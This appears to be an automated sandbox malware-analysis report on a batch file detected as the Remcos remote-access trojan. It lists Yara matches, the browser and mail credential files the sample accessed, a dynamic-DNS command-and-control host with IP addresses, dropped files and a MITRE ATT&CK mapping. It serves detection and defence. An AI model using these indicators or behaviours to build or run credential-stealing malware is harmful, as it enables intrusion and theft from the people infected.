                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,13_2_0041881C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,15_2_004082CD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0041739B GetVersionExW,13_2_0041739B
                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000003C.00000002.3315313393.00000000086E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000031.00000002.2500631742.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1661372685.00000000082E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000002C.00000002.2493453882.0000000007665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1663209869.0000000008A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000041.00000002.3913041557.0000000008AD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1636313804.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000050.00000002.3570365875.0000000000526000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000046.00000002.4032457091.0000000006FD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.1961674745.000000000780D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.1970540185.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.1821567285.00000000085C7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003C.00000002.3248272097.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.2318491679.0000000009167000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.1818907965.000000000808D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000037.00000002.3021043364.000000000859D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000031.00000002.2795920672.0000000008B17000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003C.00000002.3350777711.0000000008C87000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.2130722447.00000000079F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.2153331440.0000000009307000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000046.00000002.4173144196.0000000008887000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.1976169580.00000000095A7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.2044377742.000000000347B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000041.00000002.3951857716.00000000095D7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000002C.00000002.2531189391.0000000008E97000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6580, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5732, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5288, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2528, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5472, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1808, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Tries to steal Mail credentials (via file registry)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: ESMTPPassword15_2_004033F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword15_2_00402DB3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword15_2_00402DB3
                Yara detected WebBrowserPassView password recovery tool
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1356, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IVJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Yara detected Remcos RAT
                Source: Yara matchFile source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000003C.00000002.3315313393.00000000086E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000031.00000002.2500631742.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1661372685.00000000082E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000002C.00000002.2493453882.0000000007665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1663209869.0000000008A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000041.00000002.3913041557.0000000008AD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1636313804.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000050.00000002.3570365875.0000000000526000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000046.00000002.4032457091.0000000006FD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.1961674745.000000000780D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.1970540185.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.1821567285.00000000085C7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003C.00000002.3248272097.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.2318491679.0000000009167000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.1818907965.000000000808D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000037.00000002.3021043364.000000000859D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000031.00000002.2795920672.0000000008B17000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003C.00000002.3350777711.0000000008C87000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.2130722447.00000000079F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.2153331440.0000000009307000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000046.00000002.4173144196.0000000008887000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.1976169580.00000000095A7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.2044377742.000000000347B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000041.00000002.3951857716.00000000095D7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000002C.00000002.2531189391.0000000008E97000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6580, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5732, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5288, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2528, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5472, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1808, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		Valid Accounts1
                Windows Management Instrumentation                		1
                Scripting                		1
                DLL Side-Loading                		11
                Deobfuscate/Decode Files or Information                		1
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services12
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts111
                Native API                		1
                DLL Side-Loading                		111
                Process Injection                		2
                Obfuscated Files or Information                		11
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts22
                Command and Scripting Interpreter                		1
                Office Application Startup                		2
                Registry Run Keys / Startup Folder                		1
                Software Packing                		1
                Credentials in Registry                		3
                File and Directory Discovery                		SMB/Windows Admin Shares11
                Input Capture                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                PowerShell                		2
                Registry Run Keys / Startup Folder                		Login Hook1
                DLL Side-Loading                		NTDS16
                System Information Discovery                		Distributed Component Object Model2
                Clipboard Data                		1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading                		LSA Secrets121
                Security Software Discovery                		SSHKeylogging2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                Virtualization/Sandbox Evasion                		Cached Domain Credentials121
                Virtualization/Sandbox Evasion                		VNCGUI Input Capture213
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                Process Injection                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1612237 Sample: 5kldoushde.bat Startdate: 11/02/2025 Architecture: WINDOWS Score: 100 80 abokirem.duckdns.org 2->80 82 geoplugin.net 2->82 84 0x0.st 2->84 92 Suricata IDS alerts for network traffic 2->92 94 Found malware configuration 2->94 96 Malicious sample detected (through community Yara rule) 2->96 100 14 other signatures 2->100 10 cmd.exe 1 2->10         started        13 cmd.exe 1 2->13         started        15 cmd.exe 1 2->15         started        17 12 other processes 2->17 signatures3 98 Uses dynamic DNS services 80->98 process4 signatures5 114 Suspicious powershell command line found 10->114 116 Bypasses PowerShell execution policy 10->116 19 cmd.exe 3 10->19         started        22 conhost.exe 10->22         started        24 cmd.exe 2 13->24         started        26 conhost.exe 13->26         started        28 cmd.exe 2 15->28         started        30 conhost.exe 15->30         started        32 cmd.exe 2 17->32         started        34 cmd.exe 2 17->34         started        36 22 other processes 17->36 process6 signatures7 102 Suspicious powershell command line found 19->102 38 powershell.exe 19 34 19->38         started        43 conhost.exe 19->43         started        49 2 other processes 24->49 51 2 other processes 26->51 45 powershell.exe 28->45         started        47 conhost.exe 28->47         started        53 2 other processes 32->53 55 2 other processes 34->55 57 20 other processes 36->57 process8 dnsIp9 86 abokirem.duckdns.org 37.120.208.40, 49709, 49713, 56379 M247GB Romania 38->86 88 0x0.st 168.119.145.117, 443, 49708, 49710 HETZNER-ASDE Germany 38->88 90 geoplugin.net 178.237.33.50, 49715, 80 ATOM86-ASATOM86NL Netherlands 38->90 74 C:\Users\user\...\StartupScript_f1e01fdf.cmd, ASCII 38->74 dropped 76 C:\ProgramData\remcos\logs.dat, data 38->76 dropped 106 Detected Remcos RAT 38->106 108 Tries to steal Mail credentials (via file registry) 38->108 110 Maps a DLL or memory area into another process 38->110 112 2 other signatures 38->112 59 powershell.exe 14 38->59         started        63 cmd.exe 38->63         started        65 powershell.exe 38->65         started        67 3 other processes 38->67 file10 signatures11 process12 file13 78 C:\Users\user\AppData\Local\...\xdlilvqihrr, Unicode 59->78 dropped 118 Tries to harvest and steal browser information (history, passwords, etc) 59->118 69 cmd.exe 63->69         started        72 conhost.exe 63->72         started        signatures14 process15 signatures16 104 Suspicious powershell command line found 69->104

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.